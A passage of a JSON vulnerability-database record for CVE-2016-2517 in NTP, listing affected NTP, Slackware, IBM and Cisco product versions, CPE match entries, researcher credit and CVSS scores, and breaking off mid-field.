"vendor": "ntp", "version": "4.3.47" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.30" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.68" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.15" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.29" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.37" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.28" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.19" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.76" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.58" }, { "model": "ntp", "scope": "eq", "trust": 1.0, "vendor": "ntp", "version": "4.3.17" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "ntp", "version": null }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.3.x" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.3.92" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p7" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.8" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "p74", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p153", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p150", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "p8", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p7-rc2", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p7", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p6", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p5", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "p1", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "4.2.8p6", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p5", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p4", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.8p1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.80" }, { "model": "lotus protector for mail security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.8.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "wap371 wireless access point", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "visual quality experience server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video delivery system recorder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unity express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified computing system e-series blade server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager session management edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence video communication server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence isdn link", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "support central", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3210" }, { "model": "small business series wireless access points", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1210" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sentinel", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "scos", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime service catalog virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure standalone plug and play gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "physical access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "network device security assessment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac guest server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "management heartbeat server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber guest", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(2)" }, { "model": "intrusion prevention system solutions", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "im and presence service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "identity services engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise content delivery system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "content security appliance updater servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected grid routers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "common services platform collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object store", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "clean access manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "access registrar appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "industrial router", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9100" }, { "model": "series ip phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "ntp", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": "4.3.92" }, { "model": "4.2.8p7", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "BID", "id": "88189" }, { "db": "JVNDB", "id": "JVNDB-2016-007713" }, { "db": "NVD", "id": "CVE-2016-2517" }, { "db": "CNNVD", "id": "CNNVD-201604-608" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:*:p6:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "4.2.8", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.11:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.18:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.19:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.25:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.26:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.33:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.34:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.40:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.41:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.48:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.49:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.56:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.57:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.63:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.64:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.71:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.72:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.79:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.86:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.87:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.17:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.23:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.24:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.31:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.32:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.39:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.46:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.47:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.54:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.55:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.61:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.62:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.69:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.70:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.77:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.78:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.84:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.85:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.12:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.13:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.20:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.27:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.28:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.29:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.35:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.36:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.42:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.43:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.50:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.51:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.58:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.59:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.65:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.66:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.73:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.74:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.80:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.81:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.88:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.89:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.90:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.91:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.14:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.15:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.21:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.22:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.30:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.37:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.38:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.44:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.45:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.52:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.53:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.60:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.67:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.68:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.75:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.76:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.82:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.83:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ntp:ntp:4.3.9:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2517" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Yihan Lian of the Cloud Security Team, Qihoo 360", "sources": [ { "db": "BID", "id": "88189" }, { "db": "CNNVD", "id": "CNNVD-201604-608" } ], "trust": 0.9 }, "cve": "CVE-2016-2517", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 4.9, "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 6.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:H/Au:S/C:N/I:N/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "High", "accessVector": "Network", "authentication": "Single", "author": "NVD", "availabilityImpact": "Complete", "baseScore": 4.9, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2517", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:H/Au:S/C:N/I:N/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitabilityScore": 1.6, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, { "attackComplexity": "High", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 5.3, "baseSeverity": "Medium", "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2517", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "Low", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": 